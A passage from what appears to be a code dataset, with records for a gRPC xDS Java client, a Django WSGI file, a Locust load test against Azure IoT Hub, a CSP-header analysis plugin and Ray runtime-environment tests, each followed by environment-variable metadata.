interface ClusterWatcher extends ResourceWatcher {
void onClusterChanged(ClusterUpdate update);
}
/**
* Endpoint watcher interface.
*/
interface EndpointWatcher extends ResourceWatcher {
void onEndpointChanged(EndpointUpdate update);
}
/**
* Listener watcher interface. To be used by {@link io.grpc.xds.internal.sds.XdsServerBuilder}.
*/
interface ListenerWatcher extends ResourceWatcher {
/**
* Called when receiving an update on Listener configuration.
*/
void onListenerChanged(ListenerUpdate update);
}
/**
* Shutdown this {@link XdsClient} and release resources.
*/
abstract void shutdown();
/**
* Registers a watcher to receive {@link ConfigUpdate} for service with the given target
* authority.
*
* <p>Unlike watchers for cluster data and endpoint data, at most one ConfigWatcher can be
* registered. Once it is registered, it cannot be unregistered.
*
* @param targetAuthority authority of the "xds:" URI for the server name that the gRPC client
* targets for.
* @param watcher the {@link ConfigWatcher} to receive {@link ConfigUpdate}.
*/
void watchConfigData(String targetAuthority, ConfigWatcher watcher) {
}
/**
* Registers a data watcher for the given cluster.
*/
void watchClusterData(String clusterName, ClusterWatcher watcher) {
}
/**
* Unregisters the given cluster watcher, which was registered to receive updates for the
* given cluster.
*/
void cancelClusterDataWatch(String clusterName, ClusterWatcher watcher) {
}
/**
* Registers a data watcher for endpoints in the given cluster.
*/
void watchEndpointData(String clusterName, EndpointWatcher watcher) {
}
/**
* Unregisters the given endpoints watcher, which was registered to receive updates for
* endpoints information in the given cluster.
*/
void cancelEndpointDataWatch(String clusterName, EndpointWatcher watcher) {
}
/**
* Registers a watcher for a Listener with the given port.
*/
void watchListenerData(int port, ListenerWatcher watcher) {
}
/**
* Report client load stats to a remote server for the given cluster:cluster_service.
*
* <p>Note: currently we can only report loads for a single cluster:cluster_service,
* as the design for adding clusters to report loads for while load reporting is
* happening is undefined.
*/
void reportClientStats(
String clusterName, @Nullable String clusterServiceName, LoadStatsStore loadStatsStore) {
throw new UnsupportedOperationException();
}
/**
* Stops reporting client load stats to the remote server for the given cluster:cluster_service.
*/
void cancelClientStatsReport(String clusterName, @Nullable String clusterServiceName) {
}
abstract static class XdsClientFactory {
abstract XdsClient createXdsClient();
}
/**
* An {@link ObjectPool} holding reference and ref-count of an {@link XdsClient} instance.
* Initially the instance is null and the ref-count is zero. {@link #getObject()} will create a
* new XdsClient instance if the ref-count is zero when calling the method. {@code #getObject()}
* increments the ref-count and {@link #returnObject(Object)} decrements it. Anytime when the
* ref-count gets back to zero, the XdsClient instance will be shutdown and de-referenced.
*/
static final class RefCountedXdsClientObjectPool implements ObjectPool<XdsClient> {
private final XdsClientFactory xdsClientFactory;
@VisibleForTesting
@Nullable
XdsClient xdsClient;
private int refCount;
RefCountedXdsClientObjectPool(XdsClientFactory xdsClientFactory) {
this.xdsClientFactory = Preconditions.checkNotNull(xdsClientFactory, "xdsClientFactory");
}
/**
* See {@link RefCountedXdsClientObjectPool}.
*/
@Override
public synchronized XdsClient getObject() {
if (xdsClient == null) {
checkState(
refCount == 0,
"Bug: refCount should be zero while xdsClient is null");
xdsClient = xdsClientFactory.createXdsClient();
}
refCount++;
return xdsClient;
}
/**
* See {@link RefCountedXdsClientObjectPool}.
*/
@Override
public synchronized XdsClient returnObject(Object object) {
checkState(
object == xdsClient,
"Bug: the returned object '%s' does not match current XdsClient '%s'",
object,
xdsClient);
refCount--;
checkState(refCount >= 0, "Bug: refCount of XdsClient less than 0");
if (refCount == 0) {
xdsClient.shutdown();
xdsClient = null;
}
return null;
}
}
/**
* Factory for creating channels to xDS severs.
*/
abstract static class XdsChannelFactory {
@VisibleForTesting
static boolean experimentalV3SupportEnvVar = Boolean.parseBoolean(
System.getenv("GRPC_XDS_EXPERIMENTAL_V3_SUPPORT"));
private static final String XDS_V3_SERVER_FEATURE = "xds_v3";
private static final XdsChannelFactory DEFAULT_INSTANCE = new XdsChannelFactory() {
/**
* Creates a channel to the first server in the given list.
*/
@Override
XdsChannel createChannel(List<ServerInfo> servers) {
checkArgument(!servers.isEmpty(), "No management server provided.");
XdsLogger logger = XdsLogger.withPrefix("xds-client-channel-factory");
ServerInfo serverInfo = servers.get(0);
String serverUri = serverInfo.getServerUri();
logger.log(XdsLogLevel.INFO, "Creating channel to {0}", serverUri);
List<ChannelCreds> channelCredsList = serverInfo.getChannelCredentials();
ManagedChannelBuilder<?> channelBuilder = null;
// Use the first supported channel credentials configuration.
// Currently, only "google_default" is supported.
for (ChannelCreds creds : channelCredsList) {
if (creds.getType().equals("google_default")) {
logger.log(XdsLogLevel.INFO, "Using channel credentials: google_default");
channelBuilder = GoogleDefaultChannelBuilder.forTarget(serverUri);
break;
}
}
if (channelBuilder == null) {
logger.log(XdsLogLevel.INFO, "Using default channel credentials");
channelBuilder = ManagedChannelBuilder.forTarget(serverUri);
}
ManagedChannel channel = channelBuilder
.keepAliveTime(5, TimeUnit.MINUTES)
.build();
boolean useProtocolV3 = experimentalV3SupportEnvVar
&& serverInfo.getServerFeatures().contains(XDS_V3_SERVER_FEATURE);
return new XdsChannel(channel, useProtocolV3);
}
};
static XdsChannelFactory getInstance() {
return DEFAULT_INSTANCE;
}
/**
* Creates a channel to one of the provided management servers.
*/
abstract XdsChannel createChannel(List<ServerInfo> servers);
}
static final class XdsChannel {
private final ManagedChannel managedChannel;
private final boolean useProtocolV3;
@VisibleForTesting
XdsChannel(ManagedChannel managedChannel, boolean useProtocolV3) {
this.managedChannel = managedChannel;
this.useProtocolV3 = useProtocolV3;
}
ManagedChannel getManagedChannel() {
return managedChannel;
}
boolean isUseProtocolV3() {
return useProtocolV3;
}
}
}
|
[
"\"GRPC_XDS_EXPERIMENTAL_V3_SUPPORT\""
] |
[] |
[
"GRPC_XDS_EXPERIMENTAL_V3_SUPPORT"
] |
[]
|
["GRPC_XDS_EXPERIMENTAL_V3_SUPPORT"]
|
java
| 1 | 0 | |
example/wsgi.py
|
import os
import sys
webapp_dir = os.path.dirname(os.path.abspath(__file__))
PATH = os.path.abspath(os.path.join(webapp_dir, os.path.pardir))
VENV = os.path.join(PATH, 'venv')
if PATH not in sys.path:
sys.path.insert(0, PATH)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "example.settings")
activate_this = os.path.expanduser(os.path.join(VENV, "bin", "activate_this.py"))
execfile(activate_this, dict(__file__=activate_this))
#from django.core.wsgi import get_wsgi_application
#application = get_wsgi_application()
from django.core.handlers.wsgi import WSGIHandler
application = WSGIHandler()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
load_tests/tests/locustfile_burst.py
|
import time,datetime, json, uuid, random, string, os
from locust import HttpUser, task, between,constant
from random import randint
class QuickstartUser(HttpUser):
wait_time = constant(0)
IoTHubName = os.getenv("IOT_HUB_NAME")
host = "https://" + IoTHubName + ".azure-devices.net/"
@task
def view_item(self):
deviceID = "BXConnector"
IoTHubSASToken = os.getenv("IOT_HUB_SAS_TOKEN")
# RestAPI Version
iotHubAPIVer = "2018-04-01"
target = "/devices/" + deviceID + "/messages/events?api-version=" + iotHubAPIVer
# Headers
Headers = {}
Headers['Authorization'] = IoTHubSASToken
Headers['Content-Type'] = "application/json"
# Message Payload
current_datetime = datetime.datetime.now()
body = {}
body['messageId'] = str(uuid.uuid4())
# Generate a random string of the form 'A35' etc
body['AssetName'] = random.choice(string.ascii_uppercase) + str(randint(10,99))
body['AssetPath'] = "Campus\\Bldg\\Device\\Sensor\\AssetName"
body['FaultName'] = "FSCFault"
body['FaultActiveTime'] = str(current_datetime)
body['MessageSource'] = "ICONICS FDD"
body['FaultCostValue'] = "FaultCostNumeric"
json_fault_msg = json.dumps(body)
# Send Message
resp = self.client.post(
target,
data=json_fault_msg,
auth=None,
headers=Headers,
name="BXConnectorRequest",
)
time.sleep(2.5)
|
[] |
[] |
[
"IOT_HUB_NAME",
"IOT_HUB_SAS_TOKEN"
] |
[]
|
["IOT_HUB_NAME", "IOT_HUB_SAS_TOKEN"]
|
python
| 2 | 0 | |
bsearch/plugins/unique_csp.py
|
import re
import os
from bsearch.plugins.base import Plugin
from bsearch.utils import base64decode
class UniqueCSP(Plugin):
CSP = 'Content-Security-Policy'
CSP_RE = re.compile('Content-Security-Policy: (.*?)\n')
NONCE_RE = re.compile("'nonce-(.*?)'")
TARGET = os.environ.get('TARGET', None)
def __init__(self):
self.unique_csps = set()
def process_item(self, item):
if self.TARGET is not None:
request = base64decode(item.request.get('#text'))
request = request[:10000]
if self.TARGET not in request:
return
response_text = item.response.get('#text')
if response_text is None:
return
response_text = base64decode(response_text)
response_text = response_text[:10000]
if self.CSP not in response_text:
return
mo = self.CSP_RE.search(response_text)
if not mo:
return
csp = mo.group(1)
if not csp:
return
csp = csp.strip()
# Remove the nonce random string in order to group the same CSP
csp = self.NONCE_RE.sub('abcdef0987654321', csp)
# Save
self.unique_csps.add(csp)
def end(self):
print('Got %s unique CSP:\n' % len(self.unique_csps))
unique_csps = list(self.unique_csps)
unique_csps.sort()
for csp in unique_csps:
print(csp + '\n')
|
[] |
[] |
[
"TARGET"
] |
[]
|
["TARGET"]
|
python
| 1 | 0 | |
python/ray/tests/test_runtime_env.py
|
import os
import pytest
import sys
import random
import tempfile
import requests
from pathlib import Path
import ray
from ray.test_utils import (run_string_as_driver,
run_string_as_driver_nonblocking)
from ray._private.utils import (get_wheel_filename, get_master_wheel_url,
get_release_wheel_url)
import ray.experimental.internal_kv as kv
from time import sleep
driver_script = """
from time import sleep
import sys
import logging
sys.path.insert(0, "{working_dir}")
import ray
import ray.util
import os
try:
import test_module
except:
pass
try:
job_config = ray.job_config.JobConfig(
runtime_env={runtime_env}
)
if not job_config.runtime_env:
job_config=None
if os.environ.get("USE_RAY_CLIENT"):
ray.client("{address}").env({runtime_env}).namespace("").connect()
else:
ray.init(address="{address}",
job_config=job_config,
logging_level=logging.DEBUG,
namespace=""
)
except ValueError:
print("ValueError")
sys.exit(0)
except TypeError:
print("TypeError")
sys.exit(0)
except:
print("ERROR")
sys.exit(0)
if os.environ.get("EXIT_AFTER_INIT"):
sys.exit(0)
@ray.remote
def run_test():
return test_module.one()
@ray.remote
def check_file(name):
try:
with open(name) as f:
return f.read()
except:
return "FAILED"
@ray.remote
class TestActor(object):
@ray.method(num_returns=1)
def one(self):
return test_module.one()
{execute_statement}
if os.environ.get("USE_RAY_CLIENT"):
ray.util.disconnect()
else:
ray.shutdown()
sleep(10)
"""
def create_file(p):
if not p.parent.exists():
p.parent.mkdir()
with p.open("w") as f:
f.write("Test")
@pytest.fixture(scope="function")
def working_dir():
with tempfile.TemporaryDirectory() as tmp_dir:
path = Path(tmp_dir)
module_path = path / "test_module"
module_path.mkdir(parents=True)
init_file = module_path / "__init__.py"
test_file = module_path / "test.py"
with test_file.open(mode="w") as f:
f.write("""
def one():
return 1
""")
with init_file.open(mode="w") as f:
f.write("""
from test_module.test import one
""")
old_dir = os.getcwd()
os.chdir(tmp_dir)
yield tmp_dir
os.chdir(old_dir)
def start_client_server(cluster, client_mode):
from ray._private.runtime_env import PKG_DIR
if not client_mode:
return (cluster.address, {}, PKG_DIR)
ray.worker._global_node._ray_params.ray_client_server_port = "10003"
ray.worker._global_node.start_ray_client_server()
return ("localhost:10003", {"USE_RAY_CLIENT": "1"}, PKG_DIR)
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_travel():
import uuid
with tempfile.TemporaryDirectory() as tmp_dir:
dir_paths = set()
file_paths = set()
item_num = 0
excludes = []
root = Path(tmp_dir) / "test"
def construct(path, excluded=False, depth=0):
nonlocal item_num
path.mkdir(parents=True)
if not excluded:
dir_paths.add(str(path))
if depth > 8:
return
if item_num > 500:
return
dir_num = random.randint(0, 10)
file_num = random.randint(0, 10)
for _ in range(dir_num):
uid = str(uuid.uuid4()).split("-")[0]
dir_path = path / uid
exclud_sub = random.randint(0, 5) == 0
if not excluded and exclud_sub:
excludes.append(str(dir_path.relative_to(root)))
if not excluded:
construct(dir_path, exclud_sub or excluded, depth + 1)
item_num += 1
if item_num > 1000:
return
for _ in range(file_num):
uid = str(uuid.uuid4()).split("-")[0]
with (path / uid).open("w") as f:
v = random.randint(0, 1000)
f.write(str(v))
if not excluded:
if random.randint(0, 5) == 0:
excludes.append(
str((path / uid).relative_to(root)))
else:
file_paths.add((str(path / uid), str(v)))
item_num += 1
construct(root)
exclude_spec = ray._private.runtime_env._get_excludes(root, excludes)
visited_dir_paths = set()
visited_file_paths = set()
def handler(path):
if path.is_dir():
visited_dir_paths.add(str(path))
else:
with open(path) as f:
visited_file_paths.add((str(path), f.read()))
ray._private.runtime_env._dir_travel(root, [exclude_spec], handler)
assert file_paths == visited_file_paths
assert dir_paths == visited_dir_paths
"""
The following test cases are related with runtime env. It following these steps
1) Creating a temporary dir with fixture working_dir
2) Using a template named driver_script defined globally
3) Overwrite runtime_env and execute_statement in the template
4) Execute it as a separate driver and return the result
"""
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_empty_working_dir(ray_start_cluster_head, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
env["EXIT_AFTER_INIT"] = "1"
with tempfile.TemporaryDirectory() as working_dir:
runtime_env = f"""{{
"working_dir": r"{working_dir}",
"py_modules": [r"{working_dir}"]
}}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "sys.exit(0)"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out != "ERROR"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_invalid_working_dir(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
env["EXIT_AFTER_INIT"] = "1"
runtime_env = "{ 'working_dir': 10 }"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "TypeError"
runtime_env = "{ 'py_modules': [10] }"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "TypeError"
runtime_env = f"{{ 'working_dir': os.path.join(r'{working_dir}', 'na') }}"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "ValueError"
runtime_env = f"{{ 'py_modules': [os.path.join(r'{working_dir}', 'na')] }}"
# Execute the following cmd in driver with runtime_env
execute_statement = ""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env).strip().split()[-1]
assert out == "ValueError"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_single_node(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# Setup runtime env here
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node(two_node_cluster, working_dir, client_mode):
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# Testing runtime env with working_dir
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node_module(two_node_cluster, working_dir, client_mode):
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# test runtime_env iwth py_modules
runtime_env = """{ "py_modules": [test_module.__path__[0]] }"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node_local_file(two_node_cluster, working_dir, client_mode):
with open(os.path.join(working_dir, "test_file"), "w") as f:
f.write("1")
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
# test runtime_env iwth working_dir
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
vals = ray.get([check_file.remote('test_file')] * 1000)
print(sum([int(v) for v in vals]))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_exclusion(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
working_path = Path(working_dir)
create_file(working_path / "tmp_dir" / "test_1")
create_file(working_path / "tmp_dir" / "test_2")
create_file(working_path / "tmp_dir" / "test_3")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_1")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_2")
create_file(working_path / "test1")
create_file(working_path / "test2")
create_file(working_path / "test3")
tmp_dir_test_3 = str((working_path / "tmp_dir" / "test_3").absolute())
runtime_env = f"""{{
"working_dir": r"{working_dir}",
}}"""
execute_statement = """
vals = ray.get([
check_file.remote('test1'),
check_file.remote('test2'),
check_file.remote('test3'),
check_file.remote(os.path.join('tmp_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'test_2')),
check_file.remote(os.path.join('tmp_dir', 'test_3')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_2')),
])
print(','.join(vals))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
# Test it works before
assert out.strip().split("\n")[-1] == \
"Test,Test,Test,Test,Test,Test,Test,Test"
runtime_env = f"""{{
"working_dir": r"{working_dir}",
"excludes": [
# exclude by relative path
r"test2",
# exclude by dir
r"{str(Path("tmp_dir") / "sub_dir")}",
# exclude part of the dir
r"{str(Path("tmp_dir") / "test_1")}",
# exclude part of the dir
r"{str(Path("tmp_dir") / "test_2")}",
]
}}"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split("\n")[-1] == \
"Test,FAILED,Test,FAILED,FAILED,Test,FAILED,FAILED"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_exclusion_2(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
working_path = Path(working_dir)
def create_file(p):
if not p.parent.exists():
p.parent.mkdir(parents=True)
with p.open("w") as f:
f.write("Test")
create_file(working_path / "tmp_dir" / "test_1")
create_file(working_path / "tmp_dir" / "test_2")
create_file(working_path / "tmp_dir" / "test_3")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_1")
create_file(working_path / "tmp_dir" / "sub_dir" / "test_2")
create_file(working_path / "test1")
create_file(working_path / "test2")
create_file(working_path / "test3")
create_file(working_path / "cache" / "test_1")
create_file(working_path / "tmp_dir" / "cache" / "test_1")
create_file(working_path / "another_dir" / "cache" / "test_1")
tmp_dir_test_3 = str((working_path / "tmp_dir" / "test_3").absolute())
runtime_env = f"""{{
"working_dir": r"{working_dir}",
}}"""
execute_statement = """
vals = ray.get([
check_file.remote('test1'),
check_file.remote('test2'),
check_file.remote('test3'),
check_file.remote(os.path.join('tmp_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'test_2')),
check_file.remote(os.path.join('tmp_dir', 'test_3')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_1')),
check_file.remote(os.path.join('tmp_dir', 'sub_dir', 'test_2')),
check_file.remote(os.path.join("cache", "test_1")),
check_file.remote(os.path.join("tmp_dir", "cache", "test_1")),
check_file.remote(os.path.join("another_dir", "cache", "test_1")),
])
print(','.join(vals))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
# Test it works before
assert out.strip().split("\n")[-1] == \
"Test,Test,Test,Test,Test,Test,Test,Test,Test,Test,Test"
with open(f"{working_dir}/.gitignore", "w") as f:
f.write("""
# Comment
test_[12]
/test1
!/tmp_dir/sub_dir/test_1
cache/
""")
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
t = out.strip().split("\n")[-1]
assert out.strip().split("\n")[-1] == \
"FAILED,Test,Test,FAILED,FAILED,Test,Test,FAILED,FAILED,FAILED,FAILED"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_runtime_env_getter(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
print(ray.get_runtime_context().runtime_env["working_dir"])
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == working_dir
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_two_node_uri(two_node_cluster, working_dir, client_mode):
cluster, _ = two_node_cluster
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
import ray._private.runtime_env as runtime_env
import tempfile
with tempfile.NamedTemporaryFile(suffix="zip") as tmp_file:
pkg_name = runtime_env.get_project_package_name(working_dir, [], [])
pkg_uri = runtime_env.Protocol.PIN_GCS.value + "://" + pkg_name
runtime_env.create_project_package(working_dir, [], [], tmp_file.name)
runtime_env.push_package(pkg_uri, tmp_file.name)
runtime_env = f"""{{ "uris": ["{pkg_uri}"] }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
# pinned uri will not be deleted
print(list(kv._internal_kv_list("")))
assert len(kv._internal_kv_list("pingcs://")) == 1
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_regular_actors(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
test_actor = TestActor.options(name="test_actor").remote()
print(sum(ray.get([test_actor.one.remote()] * 1000)))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
@pytest.mark.parametrize("client_mode", [True, False])
def test_detached_actors(ray_start_cluster_head, working_dir, client_mode):
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, client_mode)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the following cmd in driver with runtime_env
execute_statement = """
test_actor = TestActor.options(name="test_actor", lifetime="detached").remote()
print(sum(ray.get([test_actor.one.remote()] * 1000)))
"""
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
# It's a detached actors, so it should still be there
assert len(kv._internal_kv_list("gcs://")) == 1
assert len(list(Path(PKG_DIR).iterdir())) == 2
pkg_dir = [f for f in Path(PKG_DIR).glob("*") if f.is_dir()][0]
import sys
sys.path.insert(0, str(pkg_dir))
test_actor = ray.get_actor("test_actor")
assert sum(ray.get([test_actor.one.remote()] * 1000)) == 1000
ray.kill(test_actor)
from time import sleep
sleep(5)
assert len(list(Path(PKG_DIR).iterdir())) == 1
assert len(kv._internal_kv_list("gcs://")) == 0
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_jobconfig_compatible_1(ray_start_cluster_head, working_dir):
# start job_config=None
# start job_config=something
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, True)
runtime_env = None
# To make the first one hanging there
execute_statement = """
sleep(600)
"""
script = driver_script.format(**locals())
# Have one running with job config = None
proc = run_string_as_driver_nonblocking(script, env)
# waiting it to be up
sleep(5)
runtime_env = f"""{{ "working_dir": "{working_dir}" }}"""
# Execute the second one which should work because Ray Client servers.
execute_statement = "print(sum(ray.get([run_test.remote()] * 1000)))"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "1000"
proc.kill()
proc.wait()
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_jobconfig_compatible_2(ray_start_cluster_head, working_dir):
# start job_config=something
# start job_config=None
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, True)
runtime_env = """{ "py_modules": [test_module.__path__[0]] }"""
# To make the first one hanging there
execute_statement = """
sleep(600)
"""
script = driver_script.format(**locals())
proc = run_string_as_driver_nonblocking(script, env)
sleep(5)
runtime_env = None
# Execute the following in the second one which should
# succeed
execute_statement = "print('OK')"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
assert out.strip().split()[-1] == "OK", out
proc.kill()
proc.wait()
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_jobconfig_compatible_3(ray_start_cluster_head, working_dir):
# start job_config=something
# start job_config=something else
cluster = ray_start_cluster_head
(address, env, PKG_DIR) = start_client_server(cluster, True)
runtime_env = """{ "py_modules": [test_module.__path__[0]] }"""
# To make the first one hanging ther
execute_statement = """
sleep(600)
"""
script = driver_script.format(**locals())
proc = run_string_as_driver_nonblocking(script, env)
sleep(5)
runtime_env = f"""
{{ "working_dir": test_module.__path__[0] }}""" # noqa: F541
# Execute the following cmd in the second one and ensure that
# it is able to run.
execute_statement = "print('OK')"
script = driver_script.format(**locals())
out = run_string_as_driver(script, env)
proc.kill()
proc.wait()
assert out.strip().split()[-1] == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_util_without_job_config(shutdown_only):
from ray.cluster_utils import Cluster
with tempfile.TemporaryDirectory() as tmp_dir:
with (Path(tmp_dir) / "lib.py").open("w") as f:
f.write("""
def one():
return 1
""")
old_dir = os.getcwd()
os.chdir(tmp_dir)
cluster = Cluster()
cluster.add_node(num_cpus=1)
ray.init(address=cluster.address)
(address, env, PKG_DIR) = start_client_server(cluster, True)
script = f"""
import ray
import ray.util
import os
ray.util.connect("{address}", job_config=None)
@ray.remote
def run():
from lib import one
return one()
print(ray.get([run.remote()])[0])
"""
out = run_string_as_driver(script, env)
print(out)
os.chdir(old_dir)
@pytest.mark.skipif(sys.platform == "win32", reason="Fail to create temp dir.")
def test_init(shutdown_only):
with tempfile.TemporaryDirectory() as tmp_dir:
old_dir = os.getcwd()
os.chdir(tmp_dir)
with open("hello", "w") as f:
f.write("world")
ray.init(runtime_env={"working_dir": "."})
@ray.remote
class Test:
def test(self):
with open("hello") as f:
return f.read()
t = Test.remote()
assert ray.get(t.test.remote()) == "world"
os.chdir(old_dir)
def test_get_wheel_filename():
ray_version = "2.0.0.dev0"
for sys_platform in ["darwin", "linux", "win32"]:
for py_version in ["36", "37", "38"]:
filename = get_wheel_filename(sys_platform, ray_version,
py_version)
prefix = "https://s3-us-west-2.amazonaws.com/ray-wheels/latest/"
url = f"{prefix}{filename}"
assert requests.head(url).status_code == 200
def test_get_master_wheel_url():
ray_version = "2.0.0.dev0"
test_commit = "ba6cebe30fab6925e5b2d9e859ad064d53015246"
for sys_platform in ["darwin", "linux", "win32"]:
for py_version in ["36", "37", "38"]:
url = get_master_wheel_url(test_commit, sys_platform, ray_version,
py_version)
assert requests.head(url).status_code == 200, url
def test_get_release_wheel_url():
test_commits = {
"1.4.0rc1": "e7c7f6371a69eb727fa469e4cd6f4fbefd143b4c",
"1.3.0": "0b4b444fadcdc23226e11fef066b982175804232",
"1.2.0": "1b1a2496ca51b745c07c79fb859946d3350d471b"
}
for sys_platform in ["darwin", "linux", "win32"]:
for py_version in ["36", "37", "38"]:
for version, commit in test_commits.items():
url = get_release_wheel_url(commit, sys_platform, version,
py_version)
assert requests.head(url).status_code == 200, url
@pytest.mark.skipif(
sys.platform == "win32", reason="runtime_env unsupported on Windows.")
def test_decorator_task(ray_start_cluster_head):
@ray.remote(runtime_env={"env_vars": {"foo": "bar"}})
def f():
return os.environ.get("foo")
assert ray.get(f.remote()) == "bar"
@pytest.mark.skipif(
sys.platform == "win32", reason="runtime_env unsupported on Windows.")
def test_decorator_actor(ray_start_cluster_head):
@ray.remote(runtime_env={"env_vars": {"foo": "bar"}})
class A:
def g(self):
return os.environ.get("foo")
a = A.remote()
assert ray.get(a.g.remote()) == "bar"
@pytest.mark.skipif(
